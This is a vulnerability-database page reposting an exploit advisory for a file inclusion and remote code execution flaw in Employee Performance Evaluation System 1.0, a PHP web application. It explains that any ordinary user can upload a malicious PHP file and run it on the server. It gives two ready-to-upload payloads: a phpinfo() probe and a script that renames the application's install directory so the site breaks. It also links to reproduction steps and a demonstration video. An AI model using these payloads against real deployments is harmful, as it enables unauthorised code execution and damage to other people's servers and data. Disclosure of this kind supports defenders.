Lucene search
K

Employee Performance Evaluation System 1.0 - File Inclusion Vulnerabilities

🗓️ 17 Mar 2023 00:00:00Reported by nu11secur1tyType 
zdt
 zdt
🔗 0day.today👁 499 Views

Employee Performance Evaluation System-1.0, File Inclusion Vulnerabilities, RCE, User Interaction. Critical vulnerabilit

Code
## Title: Employee Performance Evaluation System-1.0 - File Inclusion Vulnerabilities - RCE - User Interaction
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Employee Performance Evaluation System-1.0 suffer from File Inclusion - RCE Vulnerabilities.
The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server.
After then this user can execute remotely the already malicious included file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside or this information can be stolen.

STATUS: CRITICAL Vulnerability


[+]Get Info:

```PHP
<?php
// by nu11secur1ty - 2023
	phpinfo();
?>

```
[+]Exploit:

```PHP
<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0)

## Proof and Exploit:
[href](https://streamable.com/fdv1pu)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation